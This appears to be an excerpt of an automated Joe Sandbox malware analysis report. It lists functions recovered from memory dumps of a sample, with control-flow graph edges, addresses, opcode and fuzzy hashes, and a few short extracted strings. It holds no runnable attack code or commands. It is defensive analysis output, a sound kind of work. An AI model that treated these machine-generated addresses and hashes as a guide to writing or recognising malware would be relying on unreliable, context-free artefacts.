                                                                                    control_flow_graph 2724 ecd278-ecd2a8 2725 ecd2af-ecd38c call ec41a0 call ec3cc0 2724->2725 2726 ecd2aa 2724->2726 2736 ecd38e 2725->2736 2737 ecd393-ecd3b4 call ec5658 2725->2737 2726->2725 2736->2737 2739 ecd3b9-ecd3c4 2737->2739 2740 ecd3cb-ecd3cf 2739->2740 2741 ecd3c6 2739->2741 2742 ecd3d4-ecd3db 2740->2742 2743 ecd3d1-ecd3d2 2740->2743 2741->2740 2745 ecd3dd 2742->2745 2746 ecd3e2-ecd3f0 2742->2746 2744 ecd3f3-ecd437 2743->2744 2750 ecd49d-ecd4b4 2744->2750 2745->2746 2746->2744 2752 ecd439-ecd44f 2750->2752 2753 ecd4b6-ecd4db 2750->2753 2757 ecd479 2752->2757 2758 ecd451-ecd45d 2752->2758 2759 ecd4dd-ecd4f2 2753->2759 2760 ecd4f3 2753->2760 2763 ecd47f-ecd49c 2757->2763 2761 ecd45f-ecd465 2758->2761 2762 ecd467-ecd46d 2758->2762 2759->2760 2764 ecd477 2761->2764 2762->2764 2763->2750 2764->2763
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: PHq$PHq
                                                                                    • API String ID: 0-1274609152
                                                                                    • Opcode ID: 15954d99580d7ea974a1948bffdb0ff9eac0499bcd52a16f794fce6ec79b1cb0
                                                                                    • Instruction ID: d6821756b7d863f5fd810431568f59ac6c407229c27fa49473697dee48298d87
                                                                                    • Opcode Fuzzy Hash: 15954d99580d7ea974a1948bffdb0ff9eac0499bcd52a16f794fce6ec79b1cb0
                                                                                    • Instruction Fuzzy Hash: 2981A374E04218CFDB14DFAAD984B9DBBF2BF89304F149069E419AB365DB316942CF50
                                                                                    Function 00ECCA08 Relevance: 2.7, Strings: 2, Instructions: 187COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2768 ecca08-ecca38 2770 ecca3f-eccb1c call ec41a0 call ec3cc0 2768->2770 2771 ecca3a 2768->2771 2781 eccb1e 2770->2781 2782 eccb23-eccb44 call ec5658 2770->2782 2771->2770 2781->2782 2784 eccb49-eccb54 2782->2784 2785 eccb5b-eccb5f 2784->2785 2786 eccb56 2784->2786 2787 eccb64-eccb6b 2785->2787 2788 eccb61-eccb62 2785->2788 2786->2785 2790 eccb6d 2787->2790 2791 eccb72-eccb80 2787->2791 2789 eccb83-eccbc7 2788->2789 2795 eccc2d-eccc44 2789->2795 2790->2791 2791->2789 2797 eccbc9-eccbdf 2795->2797 2798 eccc46-eccc6b 2795->2798 2802 eccc09 2797->2802 2803 eccbe1-eccbed 2797->2803 2804 eccc6d-eccc82 2798->2804 2805 eccc83 2798->2805 2808 eccc0f-eccc2c 2802->2808 2806 eccbef-eccbf5 2803->2806 2807 eccbf7-eccbfd 2803->2807 2804->2805 2809 eccc07 2806->2809 2807->2809 2808->2795 2809->2808
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: PHq$PHq
                                                                                    • API String ID: 0-1274609152
                                                                                    • Opcode ID: ca954fb79d904f57183dc85fbe02ab37b33350f359978048777a49365eb6cc9c
                                                                                    • Instruction ID: 5ae634cda7b97ed160ca74e7d348ec49eb6f8a1cbc1e0d3a6fb1eab3609ca227
                                                                                    • Opcode Fuzzy Hash: ca954fb79d904f57183dc85fbe02ab37b33350f359978048777a49365eb6cc9c
                                                                                    • Instruction Fuzzy Hash: 6E819274E00218CFEB14DFAAD984B9DBBF2BF89304F249069E419AB365DB315942CF50
                                                                                    Function 00ECCCD8 Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2813 ecccd8-eccd08 2814 eccd0f-eccdec call ec41a0 call ec3cc0 2813->2814 2815 eccd0a 2813->2815 2825 eccdee 2814->2825 2826 eccdf3-ecce14 call ec5658 2814->2826 2815->2814 2825->2826 2828 ecce19-ecce24 2826->2828 2829 ecce2b-ecce2f 2828->2829 2830 ecce26 2828->2830 2831 ecce34-ecce3b 2829->2831 2832 ecce31-ecce32 2829->2832 2830->2829 2834 ecce3d 2831->2834 2835 ecce42-ecce50 2831->2835 2833 ecce53-ecce97 2832->2833 2839 eccefd-eccf14 2833->2839 2834->2835 2835->2833 2841 ecce99-ecceaf 2839->2841 2842 eccf16-eccf3b 2839->2842 2846 ecced9 2841->2846 2847 ecceb1-eccebd 2841->2847 2848 eccf3d-eccf52 2842->2848 2849 eccf53 2842->2849 2852 eccedf-eccefc 2846->2852 2850 eccebf-eccec5 2847->2850 2851 eccec7-eccecd 2847->2851 2848->2849 2853 ecced7 2850->2853 2851->2853 2852->2839 2853->2852
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: PHq$PHq
                                                                                    • API String ID: 0-1274609152
                                                                                    • Opcode ID: c5ff485d4c3693e8220837cbfe9fa29a39d4f30be3b1b3291294815fa1f06bd1
                                                                                    • Instruction ID: 787fff5dfe32348c11966635fa77e03766c2b01459a27c90468784fcda278919
                                                                                    • Opcode Fuzzy Hash: c5ff485d4c3693e8220837cbfe9fa29a39d4f30be3b1b3291294815fa1f06bd1
                                                                                    • Instruction Fuzzy Hash: 6F819174E00218DFDB14DFAAD984B9DBBF2BF89304F249069E419AB365DB315942CF50
                                                                                    Function 00ECCFAA Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2857 eccfaa-eccfd8 2858 eccfdf-ecd0bc call ec41a0 call ec3cc0 2857->2858 2859 eccfda 2857->2859 2869 ecd0be 2858->2869 2870 ecd0c3-ecd0e4 call ec5658 2858->2870 2859->2858 2869->2870 2872 ecd0e9-ecd0f4 2870->2872 2873 ecd0fb-ecd0ff 2872->2873 2874 ecd0f6 2872->2874 2875 ecd104-ecd10b 2873->2875 2876 ecd101-ecd102 2873->2876 2874->2873 2878 ecd10d 2875->2878 2879 ecd112-ecd120 2875->2879 2877 ecd123-ecd167 2876->2877 2883 ecd1cd-ecd1e4 2877->2883 2878->2879 2879->2877 2885 ecd169-ecd17f 2883->2885 2886 ecd1e6-ecd20b 2883->2886 2890 ecd1a9 2885->2890 2891 ecd181-ecd18d 2885->2891 2893 ecd20d-ecd222 2886->2893 2894 ecd223 2886->2894 2892 ecd1af-ecd1cc 2890->2892 2895 ecd18f-ecd195 2891->2895 2896 ecd197-ecd19d 2891->2896 2892->2883 2893->2894 2897 ecd1a7 2895->2897 2896->2897 2897->2892
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: PHq$PHq
                                                                                    • API String ID: 0-1274609152
                                                                                    • Opcode ID: a7305fe4a717684671af39ad1f4245881bd00451cf575842bd1b16b28f109a1b
                                                                                    • Instruction ID: 2a52f98022fdc6220748dfd67f19c99e5eb78818a8efea91351ea94e1cd1666f
                                                                                    • Opcode Fuzzy Hash: a7305fe4a717684671af39ad1f4245881bd00451cf575842bd1b16b28f109a1b
                                                                                    • Instruction Fuzzy Hash: B181C374E05218CFEB14DFAAD984B9DBBF2BF88300F149069E419AB365DB315942CF10
                                                                                    Function 00ECC738 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2901 ecc738-ecc768 2902 ecc76f-ecc84c call ec41a0 call ec3cc0 2901->2902 2903 ecc76a 2901->2903 2913 ecc84e 2902->2913 2914 ecc853-ecc874 call ec5658 2902->2914 2903->2902 2913->2914 2916 ecc879-ecc884 2914->2916 2917 ecc88b-ecc88f 2916->2917 2918 ecc886 2916->2918 2919 ecc894-ecc89b 2917->2919 2920 ecc891-ecc892 2917->2920 2918->2917 2922 ecc89d 2919->2922 2923 ecc8a2-ecc8b0 2919->2923 2921 ecc8b3-ecc8f7 2920->2921 2927 ecc95d-ecc974 2921->2927 2922->2923 2923->2921 2929 ecc8f9-ecc90f 2927->2929 2930 ecc976-ecc99b 2927->2930 2934 ecc939 2929->2934 2935 ecc911-ecc91d 2929->2935 2936 ecc99d-ecc9b2 2930->2936 2937 ecc9b3 2930->2937 2940 ecc93f-ecc95c 2934->2940 2938 ecc91f-ecc925 2935->2938 2939 ecc927-ecc92d 2935->2939 2936->2937 2941 ecc937 2938->2941 2939->2941 2940->2927 2941->2940
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: PHq$PHq
                                                                                    • API String ID: 0-1274609152
                                                                                    • Opcode ID: 5d5ddc13e093b334ac0c2be4226a5b4ccecc8c530a369afff26a19cda8f18021
                                                                                    • Instruction ID: 3560af968d8968d92049f320a4b4954e6104f0ce65cb86b451ad0e457a89a212
                                                                                    • Opcode Fuzzy Hash: 5d5ddc13e093b334ac0c2be4226a5b4ccecc8c530a369afff26a19cda8f18021
                                                                                    • Instruction Fuzzy Hash: D1819174E00218DFEB14DFAAD984B9DBBF2BF89304F249069E419AB365DB315942CF50
                                                                                    Function 06708688 Relevance: 1.9, APIs: 1, Instructions: 357COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3397f658846e30db1c80cda165a615e4e1911e50b7682fe192333ee2c8217857
                                                                                    • Instruction ID: 9c91b88716062c6010ed21ddd824bcc77894b29a57b6831176c7ad9038e494c3
                                                                                    • Opcode Fuzzy Hash: 3397f658846e30db1c80cda165a615e4e1911e50b7682fe192333ee2c8217857
                                                                                    • Instruction Fuzzy Hash: 20F1F474E01218CFEB54DFA9C884B9DBBF2BF88304F5481A9D848AB395DB709985CF51
                                                                                    Function 06701970 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 796f1cb631cae951fde20479904e4233736e6db46f3e11f78768e1578674b075
                                                                                    • Instruction ID: baefff1badc418b81a0b0556456e46c8b0b6a5cc0979cd4f3ffbc504b454ff0c
                                                                                    • Opcode Fuzzy Hash: 796f1cb631cae951fde20479904e4233736e6db46f3e11f78768e1578674b075
                                                                                    • Instruction Fuzzy Hash: C3C18278E00218CFEB54DFA5D954B9DBBB2FF88301F1081A9D809AB395DB359A85CF50
                                                                                    Function 0670E950 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4b5d7f9fdee9ae997bcd64d58ea0012f1c2be2968d9d87d2d5d24abefe0875e6
                                                                                    • Instruction ID: 9cb887aa5a761baabeeed497d2bab79ea5808178d729311323b71cb58e513900
                                                                                    • Opcode Fuzzy Hash: 4b5d7f9fdee9ae997bcd64d58ea0012f1c2be2968d9d87d2d5d24abefe0875e6
                                                                                    • Instruction Fuzzy Hash: DEC18274E00218CFEB54DFA5C954B9DBBB2FF89300F2081A9D419AB3A5DB355A85CF60
                                                                                    Function 06701288 Relevance: .2, Instructions: 220COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0aedbfbe1649d122cfd2425f2e055425371289418c375bf1ac8ab1fa44e5f714
                                                                                    • Instruction ID: 3bc3b803a47f1e78ff1e8267debc47b0c54795f5bb58f07cf819660f7daa9182
                                                                                    • Opcode Fuzzy Hash: 0aedbfbe1649d122cfd2425f2e055425371289418c375bf1ac8ab1fa44e5f714
                                                                                    • Instruction Fuzzy Hash: 55A19374E01218DFEB68CF6AC944B9DFAF2BF89300F14C1A9D408A7294DB745A85CF60
                                                                                    Function 067020A8 Relevance: .2, Instructions: 220COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a485c2cbdf1a590b137cdc61b6b468d38dcb171cd72c2d8045729b0fbdc12bf5
                                                                                    • Instruction ID: ff81ec783fb5dee9fd79db594badab287fe13ff5dd25e78d3fc0514d9b543678
                                                                                    • Opcode Fuzzy Hash: a485c2cbdf1a590b137cdc61b6b468d38dcb171cd72c2d8045729b0fbdc12bf5
                                                                                    • Instruction Fuzzy Hash: 76A10574D00208CFEB14DFA8C948B9DBBB1FF88300F209269E419A7291DB759A85CF64
                                                                                    Function 06700BA8 Relevance: .2, Instructions: 219COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1453e7dd872fecc8d5316a6ecd36185a38956a53db159633a1064697b8fc2eb1
                                                                                    • Instruction ID: c9dd1b16473783f6a093c35cbc9534bb845abe5fa004321d5b31ec7d3f4ff027
                                                                                    • Opcode Fuzzy Hash: 1453e7dd872fecc8d5316a6ecd36185a38956a53db159633a1064697b8fc2eb1
                                                                                    • Instruction Fuzzy Hash: C5A19374E01218CFEB68CF6AC944B9DBBF2BB89300F14C1A9D408A7294DB745A85CF65
                                                                                    Function 067023EE Relevance: .2, Instructions: 202COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 80fcbdd56f51655fd248b965375396715c96b5d3d55e50e75ffa0809e93fae4b
                                                                                    • Instruction ID: fb6394d004f56c89300e0d5aa8b38bf9b71b12ba83b3439a7495154ce7e1cc3e
                                                                                    • Opcode Fuzzy Hash: 80fcbdd56f51655fd248b965375396715c96b5d3d55e50e75ffa0809e93fae4b
                                                                                    • Instruction Fuzzy Hash: EC910474D00218CFEB50DFA8C848B9CBBF1FF49314F209269E419A7292DB759A85CF64
                                                                                    Function 06700B97 Relevance: .2, Instructions: 162COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 84de80b3be2275148e37a94c91fc736319719a03034d548a9fbe1b0bcb33528d
                                                                                    • Instruction ID: a4630e9b37726a94f73bcd6936df459a39ea4c3ee0698a8d62820d7d4816b774
                                                                                    • Opcode Fuzzy Hash: 84de80b3be2275148e37a94c91fc736319719a03034d548a9fbe1b0bcb33528d
                                                                                    • Instruction Fuzzy Hash: E97184B5E01618CFEB68CF6AC954B9EBBF2BF89300F14C1A9D408A7254DB745A85CF10
                                                                                    Function 00ECE97A Relevance: .2, Instructions: 150COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a8016b285e590cabdbb62c0bf243e3272b0aa459b41f45272c0b0fd7fd87644a
                                                                                    • Instruction ID: 091374599fa0ddb212d5b3d3cd3970af1a2c6b1959bf969f641b241c9151b3e8
                                                                                    • Opcode Fuzzy Hash: a8016b285e590cabdbb62c0bf243e3272b0aa459b41f45272c0b0fd7fd87644a
                                                                                    • Instruction Fuzzy Hash: 9051A574E00208DFDB18DFB6D594A9DBBB2FF89300F249129E815AB364DB315842CF14
                                                                                    Function 00ECE988 Relevance: .1, Instructions: 147COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5dd1ff30b7075c1b3e6eabd08b18e70addaf9e80f1e6bcc27b6b218903cbb09b
                                                                                    • Instruction ID: 533f95b6bd2270f5106b20d791c811f843f215fb6e8b77010f9d0068a86332c9
                                                                                    • Opcode Fuzzy Hash: 5dd1ff30b7075c1b3e6eabd08b18e70addaf9e80f1e6bcc27b6b218903cbb09b
                                                                                    • Instruction Fuzzy Hash: EB518474E00308DFDB18DFA6D594A9DBBB2BF89300F249129E819BB364DB316942CF54
                                                                                    Function 0670127A Relevance: .1, Instructions: 107COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5ba187e7ff0d489c59383f965c1d860903f3d47e1228cc9c67a3b34498058e4d
                                                                                    • Instruction ID: d448f12bcf6a58b06eb5128937b500e9577eedacf45f34127a680beac641ca55
                                                                                    • Opcode Fuzzy Hash: 5ba187e7ff0d489c59383f965c1d860903f3d47e1228cc9c67a3b34498058e4d
                                                                                    • Instruction Fuzzy Hash: 99416A71E016188BEB58CF5BD9547DEFAF3AFC9300F14C1A9C40CA6264EB7409858F51
                                                                                    Function 06701962 Relevance: .1, Instructions: 98COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f5f464be10d5ec637d97291a08dbe71fd4b36a26a9d7a9b400114a2d8edc0cd9
                                                                                    • Instruction ID: 01e9dc6b40b7c56ded60b866debc6e2134431e4e6b9c281ee1cc827f88a3f6ac
                                                                                    • Opcode Fuzzy Hash: f5f464be10d5ec637d97291a08dbe71fd4b36a26a9d7a9b400114a2d8edc0cd9
                                                                                    • Instruction Fuzzy Hash: 7A410274E00248DFEB18CFEAD4546ADBBF2AF89300F24D029D418BB294DB344946CF50
                                                                                    Function 0670E942 Relevance: .1, Instructions: 98COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dd365adbf10c7b4d4d5d4d5a11a515f2e9db08a423937a533ee65d6f63966c84
                                                                                    • Instruction ID: 45f5e9f0a6117f71e424953afe52d65263f3f3b63f93452f84481e7b1c6200c5
                                                                                    • Opcode Fuzzy Hash: dd365adbf10c7b4d4d5d4d5a11a515f2e9db08a423937a533ee65d6f63966c84
                                                                                    • Instruction Fuzzy Hash: DD41D375D01208CBEB58DFAAD9546ADBBF2BF89300F24C129C418BB2A4EB345945CF64
                                                                                    Function 00EC76F1 Relevance: 10.5, Strings: 8, Instructions: 474COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 ec76f1-ec7725 1 ec772b-ec774e 0->1 2 ec7b54-ec7b58 0->2 11 ec77fc-ec7800 1->11 12 ec7754-ec7761 1->12 3 ec7b5a-ec7b6e 2->3 4 ec7b71-ec7b7f 2->4 9 ec7bf0-ec7c05 4->9 10 ec7b81-ec7b96 4->10 17 ec7c0c-ec7c19 9->17 18 ec7c07-ec7c0a 9->18 19 ec7b9d-ec7baa 10->19 20 ec7b98-ec7b9b 10->20 15 ec7848-ec7851 11->15 16 ec7802-ec7810 11->16 24 ec7770 12->24 25 ec7763-ec776e 12->25 21 ec7c67 15->21 22 ec7857-ec7861 15->22 16->15 36 ec7812-ec782d 16->36 26 ec7c1b-ec7c56 17->26 18->26 27 ec7bac-ec7bed 19->27 20->27 30 ec7c6c-ec7c9c 21->30 22->2 28 ec7867-ec7870 22->28 31 ec7772-ec7774 24->31 25->31 74 ec7c5d-ec7c64 26->74 34 ec787f-ec788b 28->34 35 ec7872-ec7877 28->35 53 ec7c9e-ec7cb4 30->53 54 ec7cb5-ec7cbc 30->54 31->11 38 ec777a-ec77dc 31->38 34->30 41 ec7891-ec7897 34->41 35->34 60 ec782f-ec7839 36->60 61 ec783b 36->61 86 ec77de 38->86 87 ec77e2-ec77f9 38->87 43 ec789d-ec78ad 41->43 44 ec7b3e-ec7b42 41->44 58 ec78af-ec78bf 43->58 59 ec78c1-ec78c3 43->59 44->21 47 ec7b48-ec7b4e 44->47 47->2 47->28 62 ec78c6-ec78cc 58->62 59->62 63 ec783d-ec783f 60->63 61->63 62->44 66 ec78d2-ec78e1 62->66 63->15 67 ec7841 63->67 72 ec798f-ec79ba call ec7538 * 2 66->72 73 ec78e7 66->73 67->15 90 ec7aa4-ec7abe 72->90 91 ec79c0-ec79c4 72->91 76 ec78ea-ec78fb 73->76 76->30 79 ec7901-ec7913 76->79 79->30 81 ec7919-ec7931 79->81 144 ec7933 call ec80d8 81->144 145 ec7933 call ec80c9 81->145 85 ec7939-ec7949 85->44 89 ec794f-ec7952 85->89 86->87 87->11 92 ec795c-ec795f 89->92 93 ec7954-ec795a 89->93 90->2 113 ec7ac4-ec7ac8 90->113 91->44 95 ec79ca-ec79ce 91->95 92->21 96 ec7965-ec7968 92->96 93->92 93->96 98 ec79f6-ec79fc 95->98 99 ec79d0-ec79dd 95->99 100 ec796a-ec796e 96->100 101 ec7970-ec7973 96->101 103 ec79fe-ec7a02 98->103 104 ec7a37-ec7a3d 98->104 116 ec79ec 99->116 117 ec79df-ec79ea 99->117 100->101 102 ec7979-ec797d 100->102 101->21 101->102 102->21 105 ec7983-ec7989 102->105 103->104 106 ec7a04-ec7a0d 103->106 107 ec7a3f-ec7a43 104->107 108 ec7a49-ec7a4f 104->108 105->72 105->76 111 ec7a1c-ec7a32 106->111 112 ec7a0f-ec7a14 106->112 107->74 107->108 114 ec7a5b-ec7a5d 108->114 115 ec7a51-ec7a55 108->115 111->44 112->111 121 ec7aca-ec7ad4 call ec63e0 113->121 122 ec7b04-ec7b08 113->122 118 ec7a5f-ec7a68 114->118 119 ec7a92-ec7a94 114->119 115->44 115->114 120 ec79ee-ec79f0 116->120 117->120 125 ec7a6a-ec7a6f 118->125 126 ec7a77-ec7a8d 118->126 119->44 127 ec7a9a-ec7aa1 119->127 120->44 120->98 121->122 132 ec7ad6-ec7aeb 121->132 122->74 129 ec7b0e-ec7b12 122->129 125->126 126->44 129->74 131 ec7b18-ec7b25 129->131 135 ec7b34 131->135 136 ec7b27-ec7b32 131->136 132->122 141 ec7aed-ec7b02 132->141 138 ec7b36-ec7b38 135->138 136->138 138->44 138->74 141->2 141->122 144->85 145->85
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (oq$(oq$(oq$(oq$(oq$(oq$,q$,q
                                                                                    • API String ID: 0-2212926057
                                                                                    • Opcode ID: c09ffee4403244378fc4e82218a96fc3cdb804f5eb452cd80070fa64dbdf5c52
                                                                                    • Instruction ID: df039416fecfa9158ccd83348b6d61a9058e3bfe538db4f35a71032f27a70a8c
                                                                                    • Opcode Fuzzy Hash: c09ffee4403244378fc4e82218a96fc3cdb804f5eb452cd80070fa64dbdf5c52
                                                                                    • Instruction Fuzzy Hash: 82123930A042099FCB24CF69DA84E9EBBF2EF49314F149559E895AB261D732ED42CF50
